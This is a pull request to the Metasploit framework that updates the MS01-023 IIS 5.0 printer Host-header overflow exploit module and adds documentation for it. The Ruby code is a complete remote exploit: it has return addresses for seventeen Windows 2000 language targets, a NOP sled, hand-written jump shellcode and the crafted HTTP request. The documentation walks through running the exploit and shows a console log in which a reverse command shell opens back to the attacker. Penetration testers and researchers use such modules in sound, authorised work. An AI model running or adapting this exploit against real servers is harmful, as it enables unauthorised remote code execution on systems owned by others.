### PR TITLE
ms01_023_printer: cleanup; use HttpClient; add additional targets

### DIFF
--- a/documentation/modules/exploit/windows/iis/ms01_023_printer.md
+++ b/documentation/modules/exploit/windows/iis/ms01_023_printer.md
@@ -1,0 +1,108 @@
+## Vulnerable Application
+
+This exploits a buffer overflow in the request processor of the
+Internet Printing Protocol ISAPI module in IIS. This module
+works against Windows 2000 Server and Professional SP0-SP1.
+
+If the service stops responding after a successful compromise,
+run the exploit a couple more times to completely kill the
+hung process.
+
+This module has been tested successfully on:
+
+* Windows 2000 Professional SP0 (Dutch)
+* Windows 2000 Professional SP0 (Finnish)
+* Windows 2000 Professional SP0 (Greek)
+* Windows 2000 Professional SP0 (Korean)
+* Windows 2000 Professional SP0 (Turkish)
+* Windows 2000 Professional SP1 (Arabic)
+* Windows 2000 Professional SP1 (Czech)
+* Windows 2000 Professional SP1 (English)
+* Windows 2000 Professional SP1 (Greek)
+* Windows 2000 Server SP0 (Chinese)
+* Windows 2000 Server SP0 (Dutch)
+* Windows 2000 Server SP0 (English)
+* Windows 2000 Server SP0 (German)
+* Windows 2000 Server SP0 (Hungarian)
+* Windows 2000 Server SP0 (Italian)
+* Windows 2000 Server SP0 (Portuguese)
+* Windows 2000 Server SP0 (Spanish)
+* Windows 2000 Server SP0 (Turkish)
+* Windows 2000 Server SP1 (English)
+* Windows 2000 Server SP1 (French)
+* Windows 2000 Server SP1 (Swedish)
+
+## Verification Steps
+
+1. `use exploit/windows/iis/ms01_023_printer`
+1. `set RHOSTS [IP]`
+1. `show targets` to see the possible targets
+1. `set TARGET [TARGET]`
+1. `set PAYLOAD windows/shell/reverse_tcp`
+1. `set LHOST [IP]`
+1. `run`
+
+## Options
+
+
+## Scenarios
+
+### Windows 2000 Professional SP1 (EN)
+
+```
+msf6 > use exploit/windows/iis/ms01_023_printer
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/iis/ms01_023_printer) > set rhosts 192.168.200.195
+rhosts => 192.168.200.195
+msf6 exploit(windows/iis/ms01_023_printer) > check
+[*] 192.168.200.195:80 - The target appears to be vulnerable.
+msf6 exploit(windows/iis/ms01_023_printer) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Windows 2000 SP0-SP1 (Arabic)
+   1   Windows 2000 SP0-SP1 (Czech)
+   2   Windows 2000 SP0-SP1 (Chinese)
+   3   Windows 2000 SP0-SP1 (Dutch)
+   4   Windows 2000 SP0-SP1 (English)
+   5   Windows 2000 SP0-SP1 (French)
+   6   Windows 2000 SP0-SP1 (Finnish)
+   7   Windows 2000 SP0-SP1 (German)
+   8   Windows 2000 SP0-SP1 (Korean)
+   9   Windows 2000 SP0-SP1 (Hungarian)
+   10  Windows 2000 SP0-SP1 (Italian)
+   11  Windows 2000 SP0-SP1 (Portuguese)
+   12  Windows 2000 SP0-SP1 (Spanish)
+   13  Windows 2000 SP0-SP1 (Swedish)
+   14  Windows 2000 SP0-SP1 (Turkish)
+   15  Windows 2000 Pro SP0 (Greek)
+   16  Windows 2000 Pro SP1 (Greek)
+
+
+msf6 exploit(windows/iis/ms01_023_printer) > set target 4
+target => 4
+msf6 exploit(windows/iis/ms01_023_printer) > set payload windows/shell/reverse_tcp
+payload => windows/shell/reverse_tcp
+msf6 exploit(windows/iis/ms01_023_printer) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(windows/iis/ms01_023_printer) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444
+[*] Using target: Windows 2000 SP0-SP1 (English) ...
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.200.195
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.195:1168) at 2022-07-08 11:07:42 -0400
+
+
+Shell Banner:
+Microsoft Windows 2000 [Version 5.00.2195]
+-----
+
+
+C:\WINNT\system32>ver
+ver
+
+Microsoft Windows 2000 [Version 5.00.2195]
+```

--- a/modules/exploits/windows/iis/ms01_023_printer.rb
+++ b/modules/exploits/windows/iis/ms01_023_printer.rb
@@ -6,99 +6,124 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = GoodRanking
 
-  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow',
-      'Description'    => %q{
-          This exploits a buffer overflow in the request processor of
-        the Internet Printing Protocol ISAPI module in IIS. This
-        module works against Windows 2000 service pack 0 and 1. If
-        the service stops responding after a successful compromise,
-        run the exploit a couple more times to completely kill the
-        hung process.
-      },
-      'Author'         => [ 'hdm' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow',
+        'Description' => %q{
+          This exploits a buffer overflow in the request processor of the
+          Internet Printing Protocol ISAPI module in IIS. This module
+          works against Windows 2000 Server and Professional SP0-SP1.
+
+          If the service stops responding after a successful compromise,
+          run the exploit a couple more times to completely kill the
+          hung process.
+        },
+        'Author' => [ 'hdm' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2001-0241'],
           [ 'OSVDB', '3323'],
           [ 'BID', '2674'],
           [ 'MSB', 'MS01-023'],
           [ 'URL', 'https://seclists.org/lists/bugtraq/2001/May/0005.html'],
         ],
-      'Privileged'     => false,
-      'Payload'        =>
-        {
-          'Space'    => 900,
-          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
-          'StackAdjustment' => -3500,
+        'Privileged' => false,
+        'Payload' => {
+          'Space' => 900,
+          'BadChars' => "\x00\x0a\x0b\x0d\x20\x2f\x3a",
+          'StackAdjustment' => -3500
         },
-      'Targets'        =>
-        [
-          [
-            'Windows 2000 English SP0-SP1',
-            {
-              'Platform' => 'win',
-              'Ret'      => 0x732c45f3,
-            },
-          ],
-        ],
-      'Platform'       => 'win',
-      'DisclosureDate' => '2001-05-01',
-      'DefaultTarget' => 0))
+        'Targets' => [
+          # jmp esp @ compfilt.dll
+          [ 'Windows 2000 SP0-SP1 (Arabic)', { 'Ret' => 0x732345f3 } ],
+          [ 'Windows 2000 SP0-SP1 (Czech)', { 'Ret' => 0x732645f3 } ],
+          [ 'Windows 2000 SP0-SP1 (Chinese)', { 'Ret' => 0x732245f3 } ],
+          [ 'Windows 2000 SP0-SP1 (Dutch)', { 'Ret' => 0x732745f3 } ],
+          [ 'Windows 2000 SP0-SP1 (English)', { 'Ret' => 0x732c45f3 } ],
+          [ 'Windows 2000 SP0-SP1 (French)', { 'Ret' => 0x732345f3 } ],
+          [ 'Windows 2000 SP0-SP1 (Finnish)', { 'Ret' => 0x732945f3 } ],
+          [ 'Windows 2000 SP0-SP1 (German)', { 'Ret' => 0x732345f3 } ],
+          # [ 'Windows 2000 SP0-SP1 (Greek)', { 'Ret' => 0x732045f3 } ], # contains 0x20
+          [ 'Windows 2000 SP0-SP1 (Korean)', { 'Ret' => 0x731e45f3 } ],
+          [ 'Windows 2000 SP0-SP1 (Hungarian)', { 'Ret' => 0x732445f3 } ],
+          [ 'Windows 2000 SP0-SP1 (Italian)', { 'Ret' => 0x732645f3 } ],
+          [ 'Windows 2000 SP0-SP1 (Portuguese)', { 'Ret' => 0x732645f3 } ],
+          [ 'Windows 2000 SP0-SP1 (Spanish)', { 'Ret' => 0x732645f3 } ],
+          [ 'Windows 2000 SP0-SP1 (Swedish)', { 'Ret' => 0x732945f3 } ],
+          [ 'Windows 2000 SP0-SP1 (Turkish)', { 'Ret' => 0x732545f3 } ],
 
-    register_options(
-      [
-        Opt::RPORT(80)
-      ])
+          # jmp esp @ ws2_32.dll
+          [ 'Windows 2000 Pro SP0 (Greek)', { 'Ret' => 0x74f862c3 } ],
+          [ 'Windows 2000 Pro SP1 (Greek)', { 'Ret' => 0x74f85173 } ],
+        ],
+        'Arch' => [ARCH_X86],
+        'Platform' => 'win',
+        'DefaultOptions' => {
+          'PAYLOAD' => 'windows/shell/reverse_tcp'
+        },
+        'Notes' => {
+          'Reliability' => [REPEATABLE_SESSION],
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'DefaultTarget' => 4,
+        'DisclosureDate' => '2001-05-01'
+      )
+    )
+
+    register_options([
+      Opt::RPORT(80)
+    ])
   end
 
-
   def check
-    connect
-    sock.put("GET /NULL.printer HTTP/1.0\r\n\r\n")
-    resp = sock.get_once
-    disconnect
+    res = send_request_cgi({
+      'uri' => '/NULL.printer',
+      'version' => '1.0'
+    })
 
-    if !(resp and resp =~ /Error in web printer/)
-      return Exploit::CheckCode::Safe
-    end
+    return CheckCode::Unknown('Connection failed') unless res
+    return CheckCode::Safe unless res.code == 500
+    # Error response is language dependent: "<b>Error in web printer install.</b>"
+    return CheckCode::Safe unless res.body.to_s.starts_with?('<b>') && res.body.to_s.ends_with?('</b>')
 
-    connect
-    sock.put("GET /NULL.printer HTTP/1.0\r\nHost: #{"X"*257}\r\n\r\n")
-    resp = sock.get_once
-    disconnect
+    res = send_request_cgi({
+      'uri' => '/NULL.printer',
+      'vhost' => rand_text_alpha(257),
+      'version' => '1.0'
+    })
 
-    if (resp and resp =~ /locked out/)
-      print_status("The IUSER account is locked out, we can't check")
-      return Exploit::CheckCode::Detected
-    end
+    return CheckCode::Unknown('Connection failed') unless res
+    return CheckCode::Detected("The IUSER account is locked out, we can't check") if res.body.to_s.include?('locked out')
+    return CheckCode::Safe unless res.code == 500
+    return CheckCode::Safe unless res.body.to_s.starts_with?('<b>') && res.body.to_s.ends_with?('</b>')
 
-    if (resp and resp.index("HTTP/1.1 500") >= 0)
-      return Exploit::CheckCode::Vulnerable
-    end
-
-    return Exploit::CheckCode::Safe
+    CheckCode::Appears
   end
 
   def exploit
-    connect
+    print_status("Using target: #{target.name} ...")
 
-    buf = make_nops(280)
-    buf[268, 4] = [target.ret].pack('V')
+    buf = make_nops(268)
+    buf << [target.ret].pack('V')
+    buf << make_nops(8)
 
     # payload is at: [ebx + 96] + 256 + 64
-    buf << "\x8b\x4b\x60"        # mov ecx, [ebx + 96]
-    buf << "\x80\xc1\x40"        # add cl, 64
-    buf << "\x80\xc5\x01"        # add ch, 1
-    buf << "\xff\xe1"            # jmp ecx
+    buf << "\x8b\x4b\x60"  # mov ecx, [ebx + 96]
+    buf << "\x80\xc1\x40"  # add cl, 64
+    buf << "\x80\xc5\x01"  # add ch, 1
+    buf << "\xff\xe1"      # jmp ecx
 
-    sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")
+    res = send_request_cgi({
+      'uri' => "http://#{buf}/NULL.printer?#{payload.encoded}",
+      'version' => '1.0'
+    }, 5)
 
-    handler
-    disconnect
+    # It is expected that we receive no reply. A reply indicates exploit failure.
+    fail_with(Failure::UnexpectedReply, "#{res.code} #{res.message}") if res
   end
 end


### PR DESCRIPTION
Resolves Rubocop violations.

Adds documentation.

Adds `Notes` module meta information.

Sets default payload to `windows/shell/reverse_tcp`. Meterpreter no longer supports platforms before Windows XP SP3.

Adds additional offsets for various Windows 2000 Server / Professional targets.

Replaces raw socket `TCP` with `HttpClient`. This works fine in testing.
